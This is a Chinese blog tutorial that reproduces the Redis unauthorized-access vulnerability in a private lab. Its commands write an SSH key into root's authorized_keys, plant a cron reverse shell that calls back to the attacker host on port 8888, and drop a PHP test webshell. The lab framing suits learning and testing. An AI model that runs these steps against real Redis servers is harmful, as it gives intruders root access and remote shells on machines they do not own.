温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

redis漏洞复现的示例分析

发布时间:2022-01-05 17:50:08 来源:亿速云 阅读:190 作者:小新 栏目:安全技术

这篇文章给大家分享的是有关redis漏洞复现的示例分析的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。

一、漏洞简介

什么是redis

和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集 合)、zset(sorted set --有序集 合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。redis 是一个高性能的key-value数据库。redis的出现,很大程度补偿了memcached这类key/value存储的不足,在部 分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户端,使用很方便。

redis未授权访问漏洞

redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作。

漏洞的产生条件有以下两点:

(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略,直接暴露在公网;(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。

本次复现主要是:

1. Redis以root身份运行,给root账户写入SSH公钥文件,直接通过SSH登录受害服务器2.将文件写入周期性计划任务,然后接受反弹shell3.如果搭建了web服务器,写入webshell,控制服务器(此处因为是自己搭建的测试环境,只是将文件写入了/tmp目录,真实情况需要修改)

准备环境:

攻击机(kali):192.168.163.131(需要自己搭建redis-cli,和服务器端搭建步骤一样)靶机(centos):192.168.163.132

二、环境搭建

(1)下载redis压缩包

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

redis漏洞复现的示例分析

(2)将压缩包放入指定路径,并且进入指定路径

cp redis-2.8.17.tar.gz /root/Desktop/redis/redis-2.8.17.tar.gzcd redis

redis漏洞复现的示例分析

(3)解压压缩包,进入指定路径redis-2.8.17,进行安装

tar xzf redis-2.8.17.tar.gzcd redis-2.8.17make

redis漏洞复现的示例分析

(4)进入到src路径下

redis漏洞复现的示例分析

(5)将redis-server和redis-cli拷贝到/usr/bin目录下,后续方便直接启动redis服务器并且将redis-2.8.17目录下面的redis.conf拷贝到/etc下面

cp redis-server /usr/bincp redis-cli /usr/bincp redis.conf /etc/redis.conf

redis漏洞复现的示例分析

(6)启动服务

redis-server /etc/redis.conf

redis漏洞复现的示例分析

三、漏洞复现

3.1 利用“公私钥”认证获得root权限

(1)未授权访问连接(无法连接)

redis-cli -h 192.168.163.132

redis漏洞复现的示例分析

(2)因为是本地搭建,没有开启6379端口对外开放,此处为了方便,直接关闭服务器(靶机)的防火墙

/etc/init.d/iptables stop

redis漏洞复现的示例分析

(3)kali攻击机未授权访问连接

redis-cli -h 192.168.163.132keys *

redis漏洞复现的示例分析

(4)在攻击机中生成ssh公钥和私钥,密码设置为空:

ssh-keygen -t rsa

redis漏洞复现的示例分析

(5)进入.ssh目录,将生成的公钥保存到1.txt:

cd /root/.ssh(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt

redis漏洞复现的示例分析

(6)将保存ssh的公钥1.txt写入redis(使用redis-cli -h ip命令连接靶机,将文件写入):

cat 1.txt | redis-cli -h 192.168.163.132 -x set crack

redis漏洞复现的示例分析

(7)并使用 CONFIG GET dir 命令得到redis备份的路径:

CONFIG GET dir

redis漏洞复现的示例分析

(8)更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh),并且修改上传公钥文件的名称为authorized_keys

config set dir /root/.sshCONFIG SET dbfilename authorized_keys

redis漏洞复现的示例分析

(9)检查是否更改成功(查看有没有authorized_keys文件),没有问题就保存然后退出,至此成功写入ssh公钥到靶机:

CONFIG GET dbfilenamesave

redis漏洞复现的示例分析

(10)查看服务器端已经成功写入

redis漏洞复现的示例分析

(11)攻击机成功登陆到服务器

ssh -i id_rsa root@192.168.163.132

redis漏洞复现的示例分析

3.2利用crontab反弹shell

在权限足够的情况下,利用redis写入文件到周期性计划任务执行。(1)在kali攻击机里面监听指定端口

nc -lvnp 8888

redis漏洞复现的示例分析(2)向服务器写入文件

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.163.131/8888 0>&1\n\n"config set dir /var/spool/cronconfig set dbfilename rootsave

redis漏洞复现的示例分析

(3)查看服务器端的写入情况

redis漏洞复现的示例分析

(4)Kali攻击机已经可以连接了(得到了反弹shell)

redis漏洞复现的示例分析

3.3写入webshell

此处因为是自己搭建的测试环境,只是将文件写入了/tmp目录,真实情况需要修改,将文件写入web路径(1)写入文件到/tmp目录

config set dir /tmpconfig set dbfilename shell.phpset webshell "<?php phpinfo(); ?>"save

redis漏洞复现的示例分析

(2)查看服务器

redis漏洞复现的示例分析

备注:写入webshell的时候,可以使用:

set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n"

\r\n\r\n代表换行的意思,用redis写入的文件会自带一些版本信息,如果不换行可能会导致无法执行。

感谢各位的阅读!关于“redis漏洞复现的示例分析”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI